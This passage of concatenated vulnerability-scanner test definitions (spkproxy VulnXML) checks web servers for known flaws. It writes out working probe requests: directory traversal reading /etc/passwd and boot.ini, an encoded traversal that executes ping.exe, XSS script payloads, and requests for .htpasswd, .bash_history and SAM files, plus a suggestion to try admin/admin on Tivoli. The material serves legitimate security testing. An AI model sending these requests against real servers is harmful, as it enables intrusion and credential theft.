Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1579.xml0100664000076500007650000000747007566204543017662 0ustar davedave (%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1") "Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. CVE-2000-0011." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1" HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-157.xml0100664000076500007650000000742607566204543017572 0ustar davedave (%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e) "Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-158.xml0100664000076500007650000000743607566204543017574 0ustar davedave (%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e) "Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1580.xml0100664000076500007650000000722207566204543017645 0ustar davedave (signon) "Tivoli administrator login found. Test the default login of admin/admin. Tivoli allows system administration." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /signon HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Administrator Login 200 Administrator Login 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1581.xml0100664000076500007650000000702207566204543017644 0ustar davedave (cgi-test.exe) "" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/cgi-test.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1582.xml0100664000076500007650000000706207566204543017651 0ustar davedave (%2e/) "Weblogic allows source code or directory listing 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%2e/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <% 200 <% 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1583.xml0100664000076500007650000000706207566204543017652 0ustar davedave (%2f/) "Weblogic allows source code or directory listing 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%2f/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <% 200 <% 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1584.xml0100664000076500007650000000706207566204543017653 0ustar davedave (%5c/) "Weblogic allows source code or directory listing 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%5c/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <% 200 <% 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1586.xml0100664000076500007650000000730107566204543017651 0ustar davedave (%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd) "The Web_Server_4D is vulnerable to a directory traversal problem." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1587.xml0100664000076500007650000000727707566204543017666 0ustar davedave (%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini) "The Web_Server_4D is vulnerable to a directory traversal problem." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1588.xml0100664000076500007650000000710007566204543017650 0ustar davedave (%a%s%p%d) "Format bug is present & may reveal system path 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%a%s%p%d HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ \*s\\?d 200 \*s\\?d 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1589.xml0100664000076500007650000000720007566204543017652 0ustar davedave (index.html%20) "Website may reveal file system paths by adding %20 to the end of a legitimate .html request." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html%20 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ File for URL 200 File for URL 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1590.xml0100664000076500007650000000702407566204543017646 0ustar davedave (sam) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /sam HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1591.xml0100664000076500007650000000703407566204543017650 0ustar davedave (sam.bin) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /sam.bin HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1592.xml0100664000076500007650000000703007566204543017645 0ustar davedave (sam._) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /sam._ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1593.xml0100664000076500007650000000704607566204543017655 0ustar davedave (args.bat) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-dos/args.bat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1594.xml0100664000076500007650000000710007566204543017645 0ustar davedave (win-c-sample.exe) "win-c-sample.exe has a buffer overflow" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-shl/win-c-sample.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-159.xml0100664000076500007650000000722507566204543017571 0ustar davedave (%3f.jsp) "JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%3f.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Directory Listing 200 Directory Listing 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-15.xml0100664000076500007650000000715707566204543017504 0ustar davedave (?D=A) "Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /?D=A HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ index of \\/ 200 index of \\/ 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-160.xml0100664000076500007650000000720307566204543017555 0ustar davedave (%3f.jsp) "JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%3f.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-161.xml0100664000076500007650000000716007566204543017560 0ustar davedave (................../etc/passwd) "The web server allows the password file to be retrieved." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /................../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-162.xml0100664000076500007650000000732007566204543017557 0ustar davedave (.../.../.../.../.../.../.../.../.../boot.ini) "Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.../.../.../.../.../.../.../.../.../boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-163.xml0100664000076500007650000000723507566204543017565 0ustar davedave (../../../../../../../../../../etc/passwd) "It is possible to read files on the server by adding ../ in front of file name." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-164.xml0100664000076500007650000000727707566204543017574 0ustar davedave (..\..\..\..\..\..\temp\temp.class) "Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /..\..\..\..\..\..\temp\temp.class HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-165.xml0100664000076500007650000000711407566204543017563 0ustar davedave (./) "Appending '/./' to a directory may reveal php source code." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /./ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ include\\\(\\" 200 include\\\(\\" 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-166.xml0100664000076500007650000000704207566204543017564 0ustar davedave (.access) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.access HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-167.xml0100664000076500007650000000703007566204543017562 0ustar davedave (.addressbook) "PINE addressbook 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.addressbook HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-168.xml0100664000076500007650000000713007566204543017564 0ustar davedave (.bashrc) "User home dir was found with a shell rc file. This may reveal file and path information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.bashrc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-169.xml0100664000076500007650000000707407566204543017574 0ustar davedave (.bash_history) "A user's home directory may be set to the web root 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.bash_history HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-16.xml0100664000076500007650000000715707566204543017505 0ustar davedave (?M=A) "Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /?M=A HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ index of \\/ 200 index of \\/ 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-170.xml0100664000076500007650000000726707566204543017570 0ustar davedave (.cobalt/sysManage/../admin/.htaccess) "Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.cobalt/sysManage/../admin/.htaccess HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ AuthName 200 AuthName 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-171.xml0100664000076500007650000000715307566204543017563 0ustar davedave (.forward) "User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.forward HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-172.xml0100664000076500007650000000706207566204543017563 0ustar davedave (.history) "A user's home directory may be set to the web root 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.history HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-173.xml0100664000076500007650000000704607566204543017566 0ustar davedave (.htaccess) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.htaccess HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-174.xml0100664000076500007650000000704607566204543017567 0ustar davedave (.htpasswd) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.htpasswd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-175.xml0100664000076500007650000000715407566204543017570 0ustar davedave (.lynx_cookies) "User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.lynx_cookies HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-176.xml0100664000076500007650000000704207566204543017565 0ustar davedave (.passwd) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.passwd HTTP/1.0 The 